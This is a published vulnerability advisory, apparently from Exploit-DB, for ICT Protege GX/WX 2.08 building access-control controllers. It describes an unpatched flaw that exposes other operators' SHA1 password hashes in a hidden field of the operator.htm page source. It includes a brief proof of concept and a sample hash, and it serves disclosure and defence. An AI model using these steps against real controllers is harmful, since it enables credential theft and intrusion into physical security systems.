ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure

vendor:

Protege GX/WX

by:

LiquidWorm

7.5

CVSS

HIGH

Client-Side Password Hash Disclosure

798

CWE

Product Name: Protege GX/WX

Affected Version From: GX: Ver: 2.08.1002 K1B3 Lib: 04.00.217 Int: 2.3.235.J013 OS: 2.0.20 WX: Ver: 4.00 284 H062 App: 02.08.766 Lib: 04.00.169 Int: 02.2.208

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Microsoft-WinCE/6.00

2022

ICT Protege GX/WX 2.08 – Client-Side SHA1 Password Hash Disclosure

The application is vulnerable to improper access control that allows an authenticated operator to disclose SHA1 password hashes (client-side) of other users/operators.

Mitigation:

The vendor has not provided a patch or mitigation for this vulnerability at the time of writing this advisory. It is recommended to restrict access to the vulnerable application and ensure proper access control measures are in place.

Source

Exploit-DB raw data:

# Exploit Title: ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure
# Exploit Author: LiquidWorm

Vendor: Integrated Control Technology Ltd.
Product web page: https://www.ict.co
Affected version: GX: Ver: 2.08.1002 K1B3
                      Lib: 04.00.217
                      Int: 2.3.235.J013
                      OS: 2.0.20
                  WX: Ver: 4.00 284 H062
                      App: 02.08.766
                      Lib: 04.00.169
                      Int: 02.2.208

Summary: Protege GX is an enterprise level integrated access control, intrusion
detection and building automation solution with a feature set that is easy to
operate, simple to integrate and effortless to extend. Protege WX is an all-in-one,
web-based, cross-platform system that gives you a fully functional access control
and intrusion detection solution in a fraction of the time of conventional software.
With no software to install, setup is quick and simple. Connect the Controller and
system components, then open a web browser to launch the intuitive wizard-driven
interface which guides you through the process of configuring your system.

Desc: The application is vulnerable to improper access control that allows an
authenticated operator to disclose SHA1 password hashes (client-side) of other
users/operators.

Tested on: Microsoft-WinCE/6.00


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5700
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5700.php


08.02.2022

--


Navigate to http://CONTROLLER_IP/operator.htm

Source:

<p><label id="OperatorPassword">Password</label><input type="password" id="Password" value="" class="narrow" readonly=""> <input type="button" id="ButtonChangeOperatorPassword" class="narrow" style="float: right; margin-right: 23%; width: auto;" onclick="updatePassword('operator');" data-multiselect="disabled" value="Change Password"></p>
...
...
<input type="hidden" id="pswdsha" value="053e98c13fcbd7df3bf3a220088e19c867dfd4cc">
...